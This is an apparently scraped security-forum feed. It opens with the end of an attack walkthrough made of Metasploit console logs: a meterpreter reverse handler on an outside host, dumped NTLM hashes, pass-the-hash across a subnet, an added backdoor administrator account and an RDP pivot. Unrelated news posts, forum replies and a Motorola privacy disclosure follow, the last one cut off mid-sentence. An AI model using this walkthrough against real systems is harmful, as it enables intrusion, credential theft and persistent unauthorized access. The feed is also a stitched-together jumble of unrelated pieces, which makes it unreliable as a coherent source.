2-19-98 13:18:48 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` http://metasploit.pro =[ metasploit v4.6.2-1 [core:4.6 api:1.0] + -- --=[ 1113 exploits - 701 auxiliary - 192 post + -- --=[ 300 payloads - 29 encoders - 8 nops msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set LHOST cwh.dyndns.org LHOST => cwh.dyndns.org msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/ msf exploit(handler) > [*] Starting the payload handler... [*] 203.60.240.180:49160 Request received for /oOTJ... [*] 203.60.240.180:49160 Staging connection for target /oOTJ received... [*] Patched user-agent at offset 640488... [*] Patched transport at offset 640148... [*] Patched URL at offset 640216... [*] Patched Expiration Timeout at offset 640748... [*] Patched Communication Timeout at offset 640752... [*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700 sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN-UUOFVQRLB13 OS : Windows 2008 R2 (Build 7600). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter > ps -S winlogon Filtering on process name... Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 384 340 winlogon.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe meterpreter > migrate 384 [*] Migrating from 1096 to 384... [*] Migration completed successfully. meterpreter > sysinfo Computer : WIN-UUOFVQRLB13 OS : Windows 2008 R2 (Build 7600). Architecture : x64 System Language : en_US Meterpreter : x64/win64 meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3::: --------------------------------------------------------------- Now we got LM/NTLM hash for our target (203.60.240.180). ++++++++++++++++++++++++++ [0x03e] - It's Not Over ++++++++++++++++++++++++++ [ O ] \ \ p Let's move on the our final mission. \ \ \o/ \ \--'---_ /\ \ / ~~\_ ./---/__|=/_/------//~~~\ /___________________/O O \ (===(\_________(===(Oo o o O) \~~~\____/ \---\Oo__o-- ~~~~~~~ ~~~~~~~~~~ In common case, a next thing to do is to begin to crack the hashes we've got for later use. There are many caveats to cracking Windows hashes and it does take some time so you might as well begin this process ASAP right? However, there is often no reason to spend time/cycles cracking hashes when you can "PASS THE HASH". One of the most common way to "pass the hash" is by using the PSEXEC module (exploit/windows/smb/psexec) in Metasploit. This module executes an arbitrary payload by authenticating to Windows SMB using administrative credentials (password or hash), and creating a Windows service. This is a pretty powerful module on most pen-test tools, once you get to the point of dumping hashes on a Windows machine. "Once you use it successfully it will become very apparent that this power could be multiplied by several orders of magnitude if someone wrote a scanning-capable version that accepts an RHOSTS option rather than a single RHOST. Apparently that's what Carlos Perez thought when he wrote psexec_scanner" -- http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html --------------------------------------------------------------- meterpreter > background [*] Backgrounding session 1... msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner msf auxiliary(psexec_scanner) > show options Module options (auxiliary/scanner/smb/psexec_scanner): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER true no Start an Exploit Multi Handler to receive the connection LHOST yes Local Hosts for payload to connect. LPORT yes Local Port for payload to connect. OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. PAYLOAD windows/meterpreter/reverse_tcp yes Payload to use against Windows host RHOSTS yes Range of hosts to scan. SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain WORKGROUP yes SMB Domain SMBPass no SMB Password SMBUser no SMB Username THREADS yes The number of concurrent threads TYPE manual no Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual) msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org LHOST => cwh.dyndns.org msf auxiliary(psexec_scanner) > set LPORT 8443 LPORT => 8443 msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24 RHOSTS => 203.60.240.0/24 msf auxiliary(psexec_scanner) > set SMBUser administrator SMBUser => administrator msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 msf auxiliary(psexec_scanner) > set THREADS 10 THREADS => 10 msf auxiliary(psexec_scanner) > exploit [*] Using the username and password provided [*] Starting exploit multi handler [*] Started reverse handler on cwh.dyndns.org:8443 [*] Starting the payload handler... [*] Scanned 031 of 256 hosts (012% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 077 of 256 hosts (030% complete) [*] Scanned 111 of 256 hosts (043% complete) [*] Scanned 129 of 256 hosts (050% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] 203.60.240.165:445 - TCP OPEN [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 [*] 203.60.240.180:445 - TCP OPEN [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 [*] Connecting to the server... [*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'... [*] Connecting to the server... [*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'... [*] Uploading payload... [*] Uploading payload... [*] Created \ExigHylG.exe... [*] Created \xMhdkXDt.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ... [*] Obtaining a service manager handle... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")... [*] Creating a new service (qJTBfPjT - "MhIpwSR")... [*] Closing service handle... [*] Closing service handle... [*] Opening service... [*] Opening service... [*] Starting the service... [*] Starting the service... [*] Removing the service... [*] Removing the service... [*] Sending stage (751104 bytes) to 203.60.240.180 [*] Closing service handle... [*] Closing service handle... [*] Deleting \xMhdkXDt.exe... [*] Deleting \ExigHylG.exe... [*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700 [*] Sending stage (751104 bytes) to 203.60.240.165 [*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700 [*] Scanned 181 of 256 hosts (070% complete) [*] Scanned 205 of 256 hosts (080% complete) [*] Scanned 232 of 256 hosts (090% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(psexec_scanner) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180) 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-UUOFVQRLB13 cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180) 3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-HDO6QC2QVIV cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165) msf auxiliary(psexec_scanner) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-HDO6QC2QVIV OS : Windows 2008 R2 (Build 7600). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter > shell Process 2568 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>net user cwh 5plus4=10 /add net user cwh 5plus4=10 /add The command completed successfully. C:\Windows\system32>net localgroup administrators cwh /add net localgroup administrators cwh /add The command completed successfully. C:\Windows\system32>exit --------------------------------------------------------------- So we were able to compromise another machine (203.60.240.165). We typed "netstat -an" to view open ports on the target and found that Remote Desktop (MSRDP on port 3389) opened but we cannot directly remote to the target because the port was filtered by firewall. But there is the way to bypass this control. We used "portfwd" command from the Meterpreter shell. Portfwd is most commonly used as a pivoting technique to allow direct access to machines otherwise inaccessible from the attacking system. Running this command on the compromised host with access to both the attacker and destination network (or system), we can essentially forward TCP connections through this machine effectively making it a pivot point much like the port forwarding technique used with an ssh connection, portfwd will relay TCP connections to and from the connected machines. --------------------------------------------------------------- meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389 [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389 --------------------------------------------------------------- Lastly, we used rdesktop to connect to machine target server (203.60.240.165) with following command. --------------------------------------------------------------- [zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost --------------------------------------------------------------- FULLY COMPROMISED!! GGWP! #################### [0x04] - Greetz To #################### Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2, diF, MaYaSeVeN Special Thx : Exploit-db.com © Offensive Security 2011 Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
-
[h=1]29C3 29C3 GSM Cell phone network review[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
-
[h=1]29C3 Ethics in Security Research[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
-
[h=3]Snowden says, NSA works closely with Germany and other Western state for spying[/h] Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013 In an interview to be published in this week's of NSA whistleblower Edward Snowden said the US National Security Agency works closely with Germany and other Western states. The interview was conducted by US cryptography expert Jacob Appelbaum and documentary filmmaker Laura Poitras using encrypted emails shortly before Snowden became known globally for his whistleblowing. Snowden said an NSA department known as the Foreign Affairs Directorate coordinated work with foreign secret services. NSA provides analysis tools for data passing through Germany from regions such as the Middle East. "The partnerships are organized so that authorities in other countries can 'insulate their political leaders from the backlash' if it becomes public 'how grievously they're violating global privacy,' he said. Germans are particularly sensitive about eavesdropping because of the intrusive surveillance in the communist German Democratic Republic (GDR) and during the Nazi era. The US government has revoked the passport of Snowden, a former NSA contractor who is seeking to evade US justice for leaking details about a vast US electronic surveillance programme to collect phone and Internet data. He has been stranded at a Moscow airport for two weeks but three Latin American countries have now offered him asylum. Sursa: Snowden says, NSA works closely with Germany and other Western state for spying - The Hacker News
-
[h=3]Microsoft to patch Six critical Remote Code Execution vulnerabilities this Tuesday[/h] Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013 Microsoft has announced Patch Tuesday for this July Month, with seven bulletins. Out of that, one is important kernel privilege escalation flaw and six critical Remote Code Execution vulnerabilities. Patch will address vulnerabilities in Microsoft Windows, .Net Framework, Silverlight and will apply to all versions of Internet Explorer from IE6 on Windows XP to IE10 on Windows 8. Often targeted by attackers to perform drive-by malware download attacks, remote code execution flaws allow an attacker to crash an application and launch malware payloads often without any sort of notification or interaction form the user. The Windows 8 maker is also patching a kernel vulnerability disclosed at the beginning of June by Google researcher Tavis Ormandy. The issue is to do with Windows kernel's EPATHOBJ::pprFlattenRec function (CVE-2013-3660) and after Ormandy released the exploit code, Metasploit module was developed to exploit the bug. The company is planning to release the update on 9 July. As usual, all fixes will be delivered via the integrated Windows Update, so no user interaction is needed. Sursa: Microsoft to patch Six critical Remote Code Execution vulnerabilities this Tuesday - The Hacker News
-
[h=4]Following revelations about NSA surveillance, will people rush to download security and privacy software?[/h] As the U.S. government continues to pursue former NSA contractor Edward Snowden for leaking some of the country’s most sensitive intelligence secrets, the debate over federal surveillance seems to have abated somewhat—despite Snowden’s stated wish for his revelations to spark transformative and wide-ranging debate, it doesn’t seem as if anyone’s taking to the streets to protest the NSA’s reported monitoring of Americans’ emails and phone-call metadata. But that doesn’t mean privacy is dead: even before the NSA story broke, more and more companies were producing apps designed to eradicate and obfuscate user data, guarding sensitive communications from prying eyes. Late last year, for example, startup Silent Circle launched software tools for mobile devices to encrypt data while in transit, including PGP email (interoperable with external email clients) and secure video chat; its Burn Notice feature can erase messages and files after a few seconds. In December 2012, Facebook launched Poke, which nukes pictures, text and video after a predetermined amount of time. Poke was the social network’s response to the popular Snapchat, which gives images the ability to self-destruct. On the enterprise side of the equation, there’s Voltage Security, with a variety of encryption and tokenization tools; Liaison, which traffics in communications and transaction encryption; and, for database security, Application Security. In a recent email to Slashdot, the Electronic Frontier Foundation (EFF) also recommended that the security-conscious consider Tor, HTTPS (Hypertext Transfer Protocol Secure), and host-proof cryptographic platforms such as SpiderOak as methods of locking down sensitive data and communications. Will the recent revelations about the NSA lead to a spike in demand for sophisticated privacy software, leading to a glut of new apps that vaporize or encrypt data? Will privacy become a hot new segment for developers and startups? Americans are certainly concerned about privacy. In September 2012, the Pew Research Center’s Internet & American Life Project released a poll suggesting that more than 50 percent of smartphone users had decided not to install a particular app because of concerns over how the software stored and shared personal data. Other surveys have indicated similar worries over sanctity of user data. However, individual privacy concerns might not be driving investment in privacy and security software—concern over sophisticated hacking of corporate and governmental databases, and the resulting theft of valuable intellectual property, has been powering an uptick in security-related investment since at least early 2012. Tech companies might not care overmuch about your personal data—indeed, shielding your personal data prevents many IT giants from selling ads against it—but they will respond to deep-pocketed businesses’ need for hardened communications and digital storage. Ultimately, business will be the driver for security and privacy software. It’s just not an exciting topic for most people, who will rush to download the latest iteration of Instagram or Plants vs. Zombies, but who often throw up their hands and profess ignorance when asked about how they lock down their data. Those sophisticated enough—or paranoid enough—will continue to seek out solutions. But it’s unlikely that privacy is poised to become the next explosive growth opportunity, despite the current headlines. Sursa: Is Privacy the Next Big IT Industry?
-
Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest [Lhasa, China, July 2, 2013]: Huawei, a leading global information and communications technology (ICT) solutions provider, today announced the successful deployment with China Mobile of 4G coverage atop Mount Everest, 5,200 meters above sea level. At a June 11 ceremony marking the launch of the service, China Mobile demonstrated a series of new 4G technologies to more than 200 guests including live HD video streaming from a Mount Everest base camp to the event venue. Huawei has already delivered 4G solutions to other parts of the region including EPC, integrated equipment rooms, BTS, microwave transmission and 4G devices. In 2007, Huawei worked with China Mobile and others to realize GSM coverage on Mount Everest to ensure mountain climber safety and to prepare for a leg of the 2008 Olympic Games torch relay. Huawei’s GSM base stations at the Mount Everest base camp have operated smoothly ever since and continue to provide visitors with mobile services. David Wang, President of Huawei Wireless Networks, said: “Bringing 4G to Mount Everest marks an important milestone in global LTE TDD development. We are very excited to make this possible, and look forward to working with more operators worldwide to bring high-speed mobile broadband services anytime and anywhere.” By May 2013, Huawei has deployed LTE TDD solutions for nearly 40 operators in Asia, the Middle East, North America, South America, Western Europe, Russia and Africa. Sursa: Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest - About Huawei
-
Penetration Testing for iPhone Applications: iPhone forensics can be performed on the backups made by iTunes or directly on the live device. This Previous article on iPhone forensics detailed the forensic techniques and the technical challenges involved in performing live device forensics. Forensic analysis on a live device reboots the phone and may alter the information stored on the device. In critical cases, forensic examiners rely on analyzing the iPhone logical backups acquired through iTunes. iTunes uses AFC (Apple file connection) protocol to take the backup and also the backup process does not modify anything on the iPhone except the escrow key records. This article explains the technical procedure and challenges involved in extracting data and artifacts from the iPhone backups. Understanding the forensics techniques on iTunes backups is also useful in cases where we get physical access to the suspect’s computer instead of the iPhone directly. When a computer is used to sync with the iPhone, most of the information on the iPhone is likely to be backed up onto the computer. So, gaining access to the computer’s file system will also give access to the mobile devices’ data. Note: iPhone 4 GSM model with iOS 5.0.1 is used for the demos. Backups shown in the article are captured using iTunes 10.6. Goal: Extracting data and artifacts from the backup without altering any information. Researchers at Sogeti Labs have released open source forensic tools (with the support of iOS 5) to read normal and encrypted iTunes backups. Below are the details outlining their research and an overview on usage of backup recovery tools. Backups: With iOS 5, data stored on the iPhone can be backed up to a computer with iTunes or to a cloud based storage with iCloud. This article briefs about iCloud backups and provides a deep analysis of iTunes backups. ............................................................................ iPhone Forensics – Analysis of iOS 5 backups : Part 1 iPhone Forensics – Analysis of iOS 5 backups : Part 2 Penetration Testing for iPhone Applications – Part 3 Penetration Testing for iPhone Applications – Part 4 Penetration Testing for iPhone Applications – Part 5
-
1. E un fel de kickstarter in care investitia e de 500 de $? 2. Din cei 500 de $ cati ii vor reveni programatorului? Sau munca omului nu este considerata "in cadrul proiectului"? 3. Cui revin drepturile de autor pentru proiectul respectiv daca acesta e castigator? 4. Dupa ce un proiect castiga, ce se intampla mai departe? Cum se dezvolta? Sunt doar cateva intrebari prin care vreau sa ma asigur ca totul e in regula.
-
Ar fi frumos un tutorial despre cum functioneaza, in detaliu.
- 11 replies
-
- criptografie
- photobear
-
(and 3 more)
Tagged with:
-
Da, se pot modifica datele. Cel mai practic e sa aloci memorie in procesul repsectiv (VirtualAllocEx) si sa pui in acel buffer datele modificate, iar la apelul functiei sa folosesti noile date (pointerul alocat de tine).
-
Motorola Is Listening article by Ben Lincoln In June of 2013, I made an interesting discovery about the Android phone (a Motorola Droid X2) which I was using at the time: it was silently sending a considerable amount of sensitive information to Motorola, and to compound the problem, a great deal of it was over an unencrypted HTTP channel. If you're in a hurry, you can skip straight to the Analysis - email, ActiveSync, and social networking section - that's where the most sensitive information (e.g. email/social network account passwords) is discussed. Technical notes The screenshots and other data in this article are more heavily-redacted than I would prefer in the interest of full disclosure and supporting evidence. There are several reasons for this: There is a considerable amount of binary, hex-encoded, and base64-encoded data mixed in with the traffic. As I have not performed a full reverse-engineering of the data, it's hard for me to know if any of these values are actually sensitive at this time, or in the future when someone more thoroughly decodes the protocol. My employer reminds its employees that publicly identifying themselves as employees of that organization conveys certain responsibilities upon them. I do not speak for my employer, so all information that would indicate who that employer is has been removed. I would rather not expose my personal information more than Motorola has already. Discovery I was using my personal phone at work to do some testing related to Microsoft Exchange ActiveSync. In order to monitor the traffic, I had configured my phone to proxy all HTTP and HTTPS traffic through Burp Suite Professional - an intercepting proxy that we use for penetration testing - so that I could easily view the contents of the ActiveSync communication. Looking through the proxy history, I saw frequent HTTP connections to ws-cloud112-blur.svcmot.com mixed in with the expected ActiveSync connections. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] ActiveSync Configuration Information [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] ActiveSync configuration information being sent to Motorola's Blur service. [/TD] [/TR] [/TABLE] As of 22 June, 2013, svcmot.com is a domain owned by Motorola, or more specifically: Motorola Trademark Holdings, LLC 600 North US Highway 45 Attn: Law Department Libertyville IL 60048 US internic@motorola.com +1.8475765000 Fax: +1.8475234348 I was quickly able to determine that the connections to Motorola were triggered every time I updated the ActiveSync configuration on my phone, and that the unencrypted HTTP traffic contained the following data: The DNS name of the ActiveSync server (only sent when the configuration is first created). The domain name and user ID I specified for authentication. The full email address of the account. The name of the connection. As I looked through more of the proxy history, I could see less-frequent connections in which larger chunks of data were sent - for example, a list of all the application shortcuts and widgets on my phone's home screen(s). Analysis - email, ActiveSync, and social networking I decided to try setting up each of the other account types that the system would allow me to, and find out what was captured. Facebook and Twitter For both of these services, the email address and password for the account are sent to Motorola. Both services support a mechanism (oAuth) explicitly intended to make this unnecessary, but Motorola does not use that more-secure mechanism. The password is only sent over HTTPS, so at least it can't be easily intercepted by most third parties. Most subsequent connectivity to both services (other than downloading images) is proxied through Motorola's system on the internet using unencrypted HTTP, so Motorola and anyone running a network capture can easily see who your friends/contacts are (including your friends' email addresses), what posts you're reading and writing, and so on. They'll also get a list of which images you're viewing, even though the actual image download comes directly from the source. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Facebook and Twitter data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook wall post by friend [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook wall post by self [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Silent Signon [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter following information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter post [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter posts are also read through Blur [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] You know your software is trustworthy and has nothing to hide when it has a function called "silent signon". [/TD] [/TR] [/TABLE] Photobucket and Picasa For both services, email address and password are sent to Motorola over HTTPS. For Photobucket, username and image URLs are sent over unencrypted HTTP. For Picasa, email address, display name, friend information, and image URLs are sent over unencrypted HTTP. During my testing of Photobucket, the photo was uploaded through Motorola's system (over HTTPS). I was not able to successfully upload a photo to Picasa, although it appeared that the same would have been true for that service. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Photobucket password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Photobucket user ID and friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Picasa password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Picasa name and friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Photo uploads (to Facebook, Photobucket, etc.) When uploading images, the uploaded image passes through Motorola's Blur servers, and at least some of the time is uploaded with its EXIF data intact. EXIF data is where things like GPS coordinates are stored. The full path of the original image on the device is also sent to Motorola. For example, /mnt/sdcard/dcim/Camera/2013-06-20_09-00-00_000.jpg. Android devices name phone-camera images using the time they were taken with millisecond resolution, which can almost certainly be used as a unique device identifier for your phone (how many other people were taking a picture at exactly that millisecond?), assuming you leave the original photo on your phone. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Data sent to Motorola's Blur service when uploading photos [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Full local path [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EXIF data [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Service username and tags [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Youtube Email address and password are sent to Motorola over HTTPS. Email address is also sent to Motorola over unencrypted HTTP, along with some other data that I haven't deciphered. I didn't have time to create and upload a video, so I'm not sure what else might be sent. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Youtube data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Youtube password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Email address [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Exchange ActiveSync Domain name, username, email address, and name of the connection are sent over unencrypted HTTP. When a new connection is created, the Exchange ActiveSync server's DNS name is also sent. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Exchange ActiveSync data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS initial setup [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] IMAP/POP3 email Email address, inbound/outbound server names, and the name of the connection are sent over unencrypted HTTP. There is a lot of other encoded/encrypted data included which I haven't deciphered. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] IMAP account data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] IMAP configuration [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] One of the few screenshots I can leave some of the important details visible in - in this case, because the account in question is already on every spam list in the world. [/TD] [/TR] [/TABLE] Yahoo Mail Email address is sent over unencrypted HTTP. This type of account seems to be handled in at least sort of the correct way by Motorola's software, in that 